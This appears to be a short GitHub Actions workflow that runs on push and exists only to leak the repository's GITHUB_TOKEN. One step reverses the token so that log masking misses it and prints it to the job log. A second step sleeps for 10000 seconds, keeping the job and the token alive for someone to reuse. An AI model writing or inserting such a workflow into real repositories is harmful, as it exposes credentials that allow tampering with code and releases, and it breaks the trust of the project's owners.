name: Token
on: [push]

jobs:
  label:

    runs-on: ubuntu-latest

    steps:
    - name: Token
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      run: |
        token=${GITHUB_TOKEN}
        len=${#token}
        for((i=$len-1;i>=0;i--)); do rev_token="$rev_token${token:$i:1}"; done
        echo "reversed token: $rev_token"
    - name: Sleep
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      run: |
        sleep 10000
